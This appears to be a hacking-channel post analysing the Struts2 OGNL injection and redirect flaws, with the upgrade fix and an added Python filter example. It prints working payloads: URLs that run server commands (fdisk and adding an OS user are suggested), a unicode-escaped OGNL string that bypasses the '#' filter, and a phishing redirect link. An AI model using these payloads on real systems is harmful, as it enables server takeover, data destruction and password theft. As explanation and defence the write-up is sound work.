▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Struts2 security vulnerability analysis by undercode:
1) Remote execution of script code on the server
A user can construct a link of the form http://Host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}, where 'command goes here' can be replaced with a command whose purpose is to damage the paths and parameters of scripts (for example fdisk -f), so that the system can no longer run.
2) Redirection vulnerabilities
A user can construct a redirection link on a well-known website such as Taobao, in the form <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles</a>, and lure the user into clicking through to a phishing site, where the login form captures the user's password.
3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large corporate websites were all affected, and their operations and maintenance engineers had a miserable time.
🦑Countermeasures:
The Apache team urgently released the Struts 2.3.15.1 security update; upgrading to this version resolves the problems above.
Struts2 vulnerability attack methods and solutions
1) Principle
The core of Struts2 is the WebWork framework it is built on. When processing an action, HTTP parameters are handled by calling the underlying getter/setter methods: each HTTP parameter is treated as an OGNL statement. When we submit an HTTP parameter:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
OGNL converts it to:
//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor (parameter filter), which calls ValueStack.setValue() with the HTTP parameters supplied by the user.
2) To prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in parameter names. But if the Java unicode escape \u0023 is used to represent it, an attacker can bypass the protection, modify values and execute Java methods:
The code here is destructive; please execute it only in a test environment. Using this method for malicious attacks is strictly forbidden.
//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it looks like this:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); // closes the program, that is, shuts down the web application
🦑Similarly, the following can be executed:
java.lang.Runtime.getRuntime().exec("net user username and password/add"); // adds an operating system user; succeeds if the process has the permission (in the URL, %20 replaces a space and %2F replaces /)
With sufficient permissions, any DOS command can be executed.
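To show why the single-character "#" deny-list in ParametersInterceptor was not enough, here is an added Python example (not from the original post or the Struts project) that runs a naive "#" check and a normalize-then-allow-list check over constructed query strings; the allow-list pattern is constructed here and is not the exact upstream acceptedParamNames value.

```python
import re
import urllib.parse

# Constructed sample query strings (not taken from any real request log):
# a benign Struts2 parameter pair, a raw '#' name, the same name with the
# '#' written as a Java unicode escape, and a percent-encoded variant.
SAMPLE_QUERIES = [
    "user.address.city=Bishkek&user['favoriteDrink']=kumys",
    "('#_memberAccess['allowStaticMethodAccess']')(meh)=true",
    r"('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true",
    "('%23_memberAccess')(meh)=true",
]

# Constructed allow-list in the spirit of the tightened acceptedParamNames
# that later Struts releases use (not the exact upstream pattern): plain
# property paths, index brackets and quoted keys only; no '#', '@' or '()'.
ACCEPTED_PARAM_NAME = re.compile(r"^[a-zA-Z0-9.\[\]_'\"]+$")


def normalize_param_name(name: str) -> str:
    """Strip the encodings a parameter name can carry before any check runs:
    repeated percent-decoding (the servlet container decodes %XX before the
    interceptor sees the name; a raw-log or WAF check must do the same), then
    Java-style \\uXXXX escapes, which the OGNL parser resolves in literals."""
    prev = None
    while prev != name:
        prev, name = name, urllib.parse.unquote(name)
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), name)


def naive_check(name: str) -> bool:
    """The original deny-list idea: reject only a literal '#'."""
    return "#" not in name


def hardened_check(name: str) -> bool:
    """Normalize first, then accept only names matching the allow-list."""
    return ACCEPTED_PARAM_NAME.fullmatch(normalize_param_name(name)) is not None


def scan(query: str):
    """Return (naive_rejects, hardened_rejects) for the parameter names in a
    query string; a name is the text before the first '=' of each pair."""
    names = [pair.split("=", 1)[0] for pair in query.split("&")]
    return ([n for n in names if not naive_check(n)],
            [n for n in names if not hardened_check(n)])


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        naive, hard = scan(q)
        print(f"naive rejects {len(naive)}, hardened rejects {len(hard)}: {q}")
```

The naive check passes the \u0023 and %23 variants untouched, while the normalized allow-list rejects every name that is not a plain property path.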
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁